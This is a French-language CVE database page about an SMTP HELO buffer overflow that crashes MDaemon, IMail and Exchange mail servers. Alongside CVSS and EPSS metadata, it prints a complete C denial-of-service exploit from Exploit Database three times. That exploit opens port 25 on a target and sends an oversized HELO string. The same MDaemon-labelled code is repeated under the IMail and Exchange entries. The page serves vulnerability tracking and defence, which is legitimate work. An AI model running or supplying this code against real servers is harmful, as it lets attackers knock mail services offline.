Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Denial of service to NT mail servers including Ipswitch, Mdaemon, and Exchange through a buffer overflow in the SMTP HELO command.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 23146
Date de publication : 1999-03-09 23h00 +00:00
Auteur : Rootshell
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/8622/info
It has been reported that Alt-N MDaemon server is prone to an SMTP HELO command argument buffer overflow vulnerability.
The issue presents itself likely due to insufficient bounds checking performed when handling malicious SMTP HELO command arguments of excessive length. It has been reported that a remote attacker may exploit this condition to trigger a denial of service in the affected daemon.
/*
* MDaemon SMTP server for Windows buffer overflow exploit
*
* http://www.mdaemon.com - if you dare...
*
* Tested on MDaemon 2.71 SP1
*
* http://www.rootshell.com/
*
* Released 3/10/98
*
* (C) 1998 Rootshell All Rights Reserved
*
* For educational use only. Distribute freely.
*
* Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
* connector if SP2 has NOT been installed.
*
* Danger!
*
* A malicous user could use this bug to execute arbitrary code on the
* remote system.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(10000);
sprintf(buffer, "HELO ");
for (i = 0; i<4096; i++)
strcat(buffer, "x");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
Exploit Database EDB-ID : 23145
Date de publication : 1998-03-09 23h00 +00:00
Auteur : Rootshell
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/8621/info
It has been reported that Ipswitch IMail server is prone to an SMTP HELO command argument buffer overflow vulnerability.
The issue presents itself likely due to insufficient bounds checking performed when handling malicious SMTP HELO command arguments of excessive length. It has been reported that a remote attacker may exploit this condition to trigger a denial of service in the affected daemon.
/*
* MDaemon SMTP server for Windows buffer overflow exploit
*
* http://www.mdaemon.com - if you dare...
*
* Tested on MDaemon 2.71 SP1
*
* http://www.rootshell.com/
*
* Released 3/10/98
*
* (C) 1998 Rootshell All Rights Reserved
*
* For educational use only. Distribute freely.
*
* Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
* connector if SP2 has NOT been installed.
*
* Danger!
*
* A malicous user could use this bug to execute arbitrary code on the
* remote system.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(10000);
sprintf(buffer, "HELO ");
for (i = 0; i<4096; i++)
strcat(buffer, "x");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
Exploit Database EDB-ID : 23113
Date de publication : 1998-03-09 23h00 +00:00
Auteur : Rootshell
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/8555/info
It has been reported that Microsoft Exchange server is prone to an SMTP HELO command argument buffer overflow vulnerability.
The issue presents itself likely due to insufficient bounds checking performed when handling malicious SMTP HELO command arguments of excessive length. It has been reported that a remote attacker may exploit this condition to trigger a denial of service in the affected daemon.
/*
* MDaemon SMTP server for Windows buffer overflow exploit
*
* http://www.mdaemon.com - if you dare...
*
* Tested on MDaemon 2.71 SP1
*
* http://www.rootshell.com/
*
* Released 3/10/98
*
* (C) 1998 Rootshell All Rights Reserved
*
* For educational use only. Distribute freely.
*
* Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
* connector if SP2 has NOT been installed.
*
* Danger!
*
* A malicous user could use this bug to execute arbitrary code on the
* remote system.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(10000);
sprintf(buffer, "HELO ");
for (i = 0; i<4096; i++)
strcat(buffer, "x");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
Products Mentioned
Configuraton 0
Ibm>>Lotus_domino_mail_server >> Version *
- Ibm>>Lotus_domino_mail_server >> Version - (Open CPE detail)
Microsoft>>Exchange_server >> Version 4.0
- Microsoft>>Exchange_server >> Version 4.0 (Open CPE detail)
Microsoft>>Exchange_server >> Version 5.0
- Microsoft>>Exchange_server >> Version 5.0 (Open CPE detail)
Références
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.